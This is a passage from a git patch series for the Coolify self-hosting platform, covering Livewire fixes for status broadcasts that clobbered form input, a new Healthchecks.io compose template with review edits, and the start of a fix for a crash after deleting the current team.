-    // writes display-only properties (URLs, cert expiry) — never input-bound text fields.
     PostgresqlGeneral::class,
     MysqlGeneral::class,
     MariadbGeneral::class,
     MongodbGeneral::class,
     KeydbGeneral::class,
     DragonflyGeneral::class,
+    ClickhouseGeneral::class,
 ]);
 
 dataset('database-status-info-components', [
     RedisStatusInfo::class,
+    PostgresqlStatusInfo::class,
+    MysqlStatusInfo::class,
+    MariadbStatusInfo::class,
+    MongodbStatusInfo::class,
+    KeydbStatusInfo::class,
+    DragonflyStatusInfo::class,
+    ClickhouseStatusInfo::class,
 ]);
 
 it('does not subscribe the form to status broadcasts when display lives in a sibling', function (string $componentClass) {
     // Regression guard for coolify#6062 / #6354 / #9695:
-    // For DBs whose status-derived display moved into a sibling component, the form
-    // itself must not subscribe to status broadcasts at all.
+    // Status broadcasts on the form would trigger a Livewire roundtrip that absorbs
+    // deferred wire:model values into the snapshot — clobbering both the typed text
+    // (resolved by the earlier refreshStatus fix) and the wire:dirty indicator.
     $listeners = resolveLivewireListeners(app($componentClass));
 
     expect($listeners)
@@ -66,20 +78,6 @@
         ->not->toHaveKey("echo-private:team.{$this->team->id},ServiceStatusChanged");
 })->with('database-general-forms-without-broadcasts');
 
-it('routes status broadcasts to refreshStatus, never to a handler that re-syncs inputs', function (string $componentClass) {
-    // Regression guard for coolify#6062 / #6354 / #9695:
-    // The form may listen to broadcasts, but only to a narrow handler (refreshStatus)
-    // that touches display-only properties. Routing to `refresh` or `$refresh` would
-    // re-sync every input property from the DB and wipe in-progress typing.
-    $listeners = resolveLivewireListeners(app($componentClass));
-
-    $databaseStatusKey = "echo-private:user.{$this->user->id},DatabaseStatusChanged";
-    $serviceCheckedKey = "echo-private:team.{$this->team->id},ServiceChecked";
-
-    expect($listeners[$databaseStatusKey] ?? null)->toBe('refreshStatus')
-        ->and($listeners[$serviceCheckedKey] ?? null)->toBe('refreshStatus');
-})->with('database-general-forms-with-narrow-refresh');
-
 function resolveLivewireListeners(object $component): array
 {
     // Livewire's HandlesEvents trait declares getListeners() as protected,
@@ -101,7 +99,7 @@ function resolveLivewireListeners(object $component): array
         ->toHaveKey("echo-private:team.{$this->team->id},ServiceChecked");
 })->with('database-status-info-components');
 
-it('reloads the mysql database model when refresh is called directly so ssl controls follow the latest status', function () {
+it('reloads the mysql status-info model when refresh is called so ssl controls follow the latest status', function () {
     $server = Server::factory()->create(['team_id' => $this->team->id]);
     $destination = StandaloneDocker::where('server_id', $server->id)->first();
     $project = Project::factory()->create(['team_id' => $this->team->id]);
@@ -122,7 +120,7 @@ function resolveLivewireListeners(object $component): array
         'destination_type' => $destination->getMorphClass(),
     ]);
 
-    $component = Livewire::test(MysqlGeneral::class, ['database' => $database])
+    $component = Livewire::test(MysqlStatusInfo::class, ['database' => $database])
         ->assertDontSee('Database should be stopped to change this settings.');
 
     $database->fill(['status' => 'running:healthy'])->save();
@@ -161,36 +159,6 @@ function resolveLivewireListeners(object $component): array
         ->and($component->get('ip'))->toBe('203.0.113.42');
 });
 
-it('preserves typed input on the postgres form when refreshStatus runs', function () {
-    $server = Server::factory()->create(['team_id' => $this->team->id]);
-    $destination = StandaloneDocker::where('server_id', $server->id)->first();
-    $project = Project::factory()->create(['team_id' => $this->team->id]);
-    $environment = Environment::factory()->create(['project_id' => $project->id]);
-
-    $database = StandalonePostgresql::create([
-        'name' => 'persisted-name',
-        'image' => 'postgres:16',
-        'postgres_user' => 'postgres',
-        'postgres_password' => 'password',
-        'postgres_db' => 'postgres',
-        'status' => 'exited:unhealthy',
-        'enable_ssl' => false,
-        'is_log_drain_enabled' => false,
-        'environment_id' => $environment->id,
-        'destination_id' => $destination->id,
-        'destination_type' => $destination->getMorphClass(),
-    ]);
-
-    $component = Livewire::test(PostgresqlGeneral::class, ['database' => $database])
-        ->set('name', 'user-was-typing-here')
-        ->set('portsMappings', '5433:5432');
-
-    $component->call('refreshStatus');
-
-    expect($component->get('name'))->toBe('user-was-typing-here')
-        ->and($component->get('portsMappings'))->toBe('5433:5432');
-});
-
 it('shows the redis ssl gate hint after the sibling is refreshed', function () {
     $server = Server::factory()->create(['team_id' => $this->team->id]);
     $destination = StandaloneDocker::where('server_id', $server->id)->first();

From 7a3fcd37d5b5057523aa5107d986f209b29d5403 Mon Sep 17 00:00:00 2001
From: Aditya Tripathi <aditya@climactic.co>
Date: Thu, 21 May 2026 10:24:49 +0000
Subject: [PATCH 18/90] fix(livewire): scope DatabaseProxyStopped to proxy
 fields, harden status trait

Clickhouse, Dragonfly, and Keydb still called syncData() inside the
DatabaseProxyStopped broadcast handler, clobbering in-progress edits to
name/description/credentials. Refresh only is_public/public_port/
public_port_timeout instead, matching the pattern used elsewhere.

Also null-guard HasDatabaseStatusInfo::getListeners() against an absent
Auth::user()/currentTeam(), add explicit return types on getListeners()
and render(), and convert inline comments in the SSL refresh test to a
PHPDoc block.
---
 .../Project/Database/Clickhouse/General.php   |  7 +++--
 .../Project/Database/Dragonfly/General.php    |  7 +++--
 .../Project/Database/Keydb/General.php        |  7 +++--
 app/Traits/HasDatabaseStatusInfo.php          | 26 ++++++++++++-------
 .../Feature/DatabaseSslStatusRefreshTest.php  |  8 +++---
 5 files changed, 37 insertions(+), 18 deletions(-)

diff --git a/app/Livewire/Project/Database/Clickhouse/General.php b/app/Livewire/Project/Database/Clickhouse/General.php
index b5c0ffff4..857300926 100644
--- a/app/Livewire/Project/Database/Clickhouse/General.php
+++ b/app/Livewire/Project/Database/Clickhouse/General.php
@@ -192,9 +192,12 @@ public function instantSave()
         }
     }
 
-    public function databaseProxyStopped()
+    public function databaseProxyStopped(): void
     {
-        $this->syncData();
+        $this->database->refresh();
+        $this->isPublic = $this->database->is_public;
+        $this->publicPort = $this->database->public_port;
+        $this->publicPortTimeout = $this->database->public_port_timeout;
         $this->dispatch('databaseUpdated');
     }
 
diff --git a/app/Livewire/Project/Database/Dragonfly/General.php b/app/Livewire/Project/Database/Dragonfly/General.php
index 5f57693b1..01a474761 100644
--- a/app/Livewire/Project/Database/Dragonfly/General.php
+++ b/app/Livewire/Project/Database/Dragonfly/General.php
@@ -184,9 +184,12 @@ public function instantSave()
         }
     }
 
-    public function databaseProxyStopped()
+    public function databaseProxyStopped(): void
     {
-        $this->syncData();
+        $this->database->refresh();
+        $this->isPublic = $this->database->is_public;
+        $this->publicPort = $this->database->public_port;
+        $this->publicPortTimeout = $this->database->public_port_timeout;
         $this->dispatch('databaseUpdated');
     }
 
diff --git a/app/Livewire/Project/Database/Keydb/General.php b/app/Livewire/Project/Database/Keydb/General.php
index 1c5c828a3..6031cb7ac 100644
--- a/app/Livewire/Project/Database/Keydb/General.php
+++ b/app/Livewire/Project/Database/Keydb/General.php
@@ -189,9 +189,12 @@ public function instantSave()
         }
     }
 
-    public function databaseProxyStopped()
+    public function databaseProxyStopped(): void
     {
-        $this->syncData();
+        $this->database->refresh();
+        $this->isPublic = $this->database->is_public;
+        $this->publicPort = $this->database->public_port;
+        $this->publicPortTimeout = $this->database->public_port_timeout;
         $this->dispatch('databaseUpdated');
     }
 
diff --git a/app/Traits/HasDatabaseStatusInfo.php b/app/Traits/HasDatabaseStatusInfo.php
index 98c939b7e..e46cccf0c 100644
--- a/app/Traits/HasDatabaseStatusInfo.php
+++ b/app/Traits/HasDatabaseStatusInfo.php
@@ -5,6 +5,7 @@
 use App\Helpers\SslHelper;
 use Carbon\Carbon;
 use Exception;
+use Illuminate\Contracts\View\View;
 use Illuminate\Support\Facades\Auth;
 
 /**
@@ -51,16 +52,23 @@ protected function showPublicUrlPlaceholder(): bool
         return false;
     }
 
-    public function getListeners()
+    public function getListeners(): array
     {
-        $userId = Auth::id();
-        $teamId = Auth::user()->currentTeam()->id;
+        $listeners = ['databaseUpdated' => 'refresh'];
 
-        return [
-            "echo-private:user.{$userId},DatabaseStatusChanged" => 'refresh',
-            "echo-private:team.{$teamId},ServiceChecked" => 'refresh',
-            'databaseUpdated' => 'refresh',
-        ];
+        $user = Auth::user();
+        if (! $user) {
+            return $listeners;
+        }
+
+        $listeners["echo-private:user.{$user->id},DatabaseStatusChanged"] = 'refresh';
+
+        $team = $user->currentTeam();
+        if ($team) {
+            $listeners["echo-private:team.{$team->id},ServiceChecked"] = 'refresh';
+        }
+
+        return $listeners;
     }
 
     public function mount(): void
@@ -150,7 +158,7 @@ public function regenerateSslCertificate(): void
         }
     }
 
-    public function render()
+    public function render(): View
     {
         return view('livewire.project.database.status-info', [
             'label' => $this->databaseLabel(),
diff --git a/tests/Feature/DatabaseSslStatusRefreshTest.php b/tests/Feature/DatabaseSslStatusRefreshTest.php
index 7b0e4c0a3..7efb03789 100644
--- a/tests/Feature/DatabaseSslStatusRefreshTest.php
+++ b/tests/Feature/DatabaseSslStatusRefreshTest.php
@@ -78,11 +78,13 @@
         ->not->toHaveKey("echo-private:team.{$this->team->id},ServiceStatusChanged");
 })->with('database-general-forms-without-broadcasts');
 
+/**
+ * Resolve a Livewire component's listeners regardless of whether the subclass
+ * exposes getListeners() publicly or only declares a $listeners array — the
+ * HandlesEvents trait keeps getListeners() protected by default.
+ */
 function resolveLivewireListeners(object $component): array
 {
-    // Livewire's HandlesEvents trait declares getListeners() as protected,
-    // so subclasses that override it as public are callable directly, but
-    // subclasses that rely on $listeners are not. Reflection handles both.
     $method = new ReflectionMethod($component, 'getListeners');
     $method->setAccessible(true);
 

From ab30b99b6e625f235db4d83396a92f1821b6d11f Mon Sep 17 00:00:00 2001
From: Victor Gomez <vicgmezp@gmail.com>
Date: Thu, 21 May 2026 09:36:52 -0400
Subject: [PATCH 19/90] Add Healthchecks.io as a service

---
 public/svgs/healthchecks.webp       | Bin 0 -> 5222 bytes
 templates/compose/healthchecks.yaml |  32 ++++++++++++++++++++++++++++
 2 files changed, 32 insertions(+)
 create mode 100644 public/svgs/healthchecks.webp
 create mode 100644 templates/compose/healthchecks.yaml

diff --git a/public/svgs/healthchecks.webp b/public/svgs/healthchecks.webp
new file mode 100644
index 0000000000000000000000000000000000000000..003f05f3f9d662904752815fa9cdde40d71b401f
GIT binary patch
literal 5222
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
a@X`Fbqb>_QDHp`3G_U<+xp`6l*ZvPw66XZ~

literal 0
HcmV?d00001

diff --git a/templates/compose/healthchecks.yaml b/templates/compose/healthchecks.yaml
new file mode 100644
index 000000000..b88c6ef40
--- /dev/null
+++ b/templates/compose/healthchecks.yaml
@@ -0,0 +1,32 @@
+# documentation: https://healthchecks.io/docs
+# slogan: Healthchecks is a cron job monitoring service. It listens for HTTP requests and email messages from your cron jobs and scheduled tasks.
+# category: monitoring
+# tags: monitoring, status, performance, web, services, applications, real-time
+# logo: svgs/healthchecks.webp
+# port: 80000
+
+services:
+  healthchecks:
+    image: "healthchecks/healthchecks:v4.2"
+    container_name: healthchecks
+    environment:
+      - SERVICE_URL_HEALTHCHECKS_8000
+      - DB=sqlite
+      - DB_NAME=/data/hc.sqlite
+      - "REGISTRATION_OPEN=${REGISTRATION_OPEN:-True}"
+      - "DEBUG=${DEBUG:-False}"
+      - "SECRET_KEY=${SECRET_KEY:?${SERVICE_PASSWORD_64_HEALTHCHECKS}}"
+      - "SITE_ROOT=${SERVICE_URL_HEALTHCHECKS}"
+      - "DEFAULT_FROM_EMAIL=${DEFAULT_FROM_EMAIL:-fixme-email-address-here}"
+      - "EMAIL_HOST=${EMAIL_HOST:-my-smtp-server-here.com}"
+      - "EMAIL_PORT=${EMAIL_PORT:-465}"
+      - "EMAIL_HOST_USER=${EMAIL_HOST_USER:-my_username}"
+      - "EMAIL_HOST_PASSWORD=${EMAIL_HOST_PASSWORD:-mypassword}"
+      - "EMAIL_USE_SSL=${EMAIL_USE_SSL:-True}"
+      - "EMAIL_USE_TLS=${EMAIL_USE_TLS:-False}"
+    volumes:
+      - "healthchecks-data:/data"
+    restart: unless-stopped
+
+volumes:
+  healthchecks-data: null

From aa4c229607048fe58c9e0ab41e1e28082d0c4b77 Mon Sep 17 00:00:00 2001
From: Victor Gomez <vicgmezp@gmail.com>
Date: Thu, 21 May 2026 11:19:31 -0400
Subject: [PATCH 20/90] Ensure proper URL is being used in SITE_ROOT

---
 templates/compose/healthchecks.yaml | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/templates/compose/healthchecks.yaml b/templates/compose/healthchecks.yaml
index b88c6ef40..fd1168aaf 100644
--- a/templates/compose/healthchecks.yaml
+++ b/templates/compose/healthchecks.yaml
@@ -11,8 +11,10 @@ services:
     container_name: healthchecks
     environment:
       - SERVICE_URL_HEALTHCHECKS_8000
+      - SERVICE_URL_HEALTHCHECKS
       - DB=sqlite
       - DB_NAME=/data/hc.sqlite
+      - "ALLOWED_HOSTS=${ALOWED_HOSTS:-*}"
       - "REGISTRATION_OPEN=${REGISTRATION_OPEN:-True}"
       - "DEBUG=${DEBUG:-False}"
       - "SECRET_KEY=${SECRET_KEY:?${SERVICE_PASSWORD_64_HEALTHCHECKS}}"

From 85abbf2555eaf59b2aefe971253c3c2f4c403844 Mon Sep 17 00:00:00 2001
From: Victor Gomez <73703121+viticodotdev@users.noreply.github.com>
Date: Thu, 21 May 2026 11:46:51 -0400
Subject: [PATCH 21/90] Update templates/compose/healthchecks.yaml

Co-authored-by: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
---
 templates/compose/healthchecks.yaml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/templates/compose/healthchecks.yaml b/templates/compose/healthchecks.yaml
index fd1168aaf..3de245ca2 100644
--- a/templates/compose/healthchecks.yaml
+++ b/templates/compose/healthchecks.yaml
@@ -11,7 +11,6 @@ services:
     container_name: healthchecks
     environment:
       - SERVICE_URL_HEALTHCHECKS_8000
-      - SERVICE_URL_HEALTHCHECKS
       - DB=sqlite
       - DB_NAME=/data/hc.sqlite
       - "ALLOWED_HOSTS=${ALOWED_HOSTS:-*}"

From 101926ca3577ac836e9cacdffbb9ff9ca52d42a4 Mon Sep 17 00:00:00 2001
From: Victor Gomez <73703121+viticodotdev@users.noreply.github.com>
Date: Thu, 21 May 2026 11:47:04 -0400
Subject: [PATCH 22/90] Update templates/compose/healthchecks.yaml

Co-authored-by: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
---
 templates/compose/healthchecks.yaml | 2 --
 1 file changed, 2 deletions(-)

diff --git a/templates/compose/healthchecks.yaml b/templates/compose/healthchecks.yaml
index 3de245ca2..b6ff8cf4e 100644
--- a/templates/compose/healthchecks.yaml
+++ b/templates/compose/healthchecks.yaml
@@ -29,5 +29,3 @@ services:
       - "healthchecks-data:/data"
     restart: unless-stopped
 
-volumes:
-  healthchecks-data: null

From afe5a03aeb42dc268748e0334a202de026ffe84e Mon Sep 17 00:00:00 2001
From: Victor Gomez <73703121+viticodotdev@users.noreply.github.com>
Date: Thu, 21 May 2026 11:47:21 -0400
Subject: [PATCH 23/90] Update templates/compose/healthchecks.yaml

Co-authored-by: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
---
 templates/compose/healthchecks.yaml | 1 -
 1 file changed, 1 deletion(-)

diff --git a/templates/compose/healthchecks.yaml b/templates/compose/healthchecks.yaml
index b6ff8cf4e..15c284770 100644
--- a/templates/compose/healthchecks.yaml
+++ b/templates/compose/healthchecks.yaml
@@ -27,5 +27,4 @@ services:
       - "EMAIL_USE_TLS=${EMAIL_USE_TLS:-False}"
     volumes:
       - "healthchecks-data:/data"
-    restart: unless-stopped
 

From d415f3a3d1e60243281676d90bc7e8de8976f0e2 Mon Sep 17 00:00:00 2001
From: Firsak <31401457+Firsak@users.noreply.github.com>
Date: Fri, 22 May 2026 11:06:32 +0200
Subject: [PATCH 24/90] fix(team): prevent 500 after deleting the current team

When a user deletes their current team, the session and cache still
reference the just-deleted team. `refreshSession()` then resolves that
stale team via `currentTeam()`, calls `Team::find()` (which returns
null because the row is gone) and dereferences `$team->id`, leaving the
session without a current team. The subsequent redirect to the team
page assigns the now-null `currentTeam()` to the non-nullable
`Team $team` property in `Team\Index::mount()`, throwing a TypeError
and producing an HTTP 500.

Guard `refreshSession()` against a deleted current team: fall back to
any team the user still belongs to, and if none remain, clear the
stale session reference instead of dereferencing null.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 bootstrap/helpers/shared.php | 24 ++++++++++++++++++++----
 1 file changed, 20 insertions(+), 4 deletions(-)

diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php
index 860b550dd..011c86744 100644
--- a/bootstrap/helpers/shared.php
+++ b/bootstrap/helpers/shared.php
@@ -353,14 +353,30 @@ function showBoarding(): bool
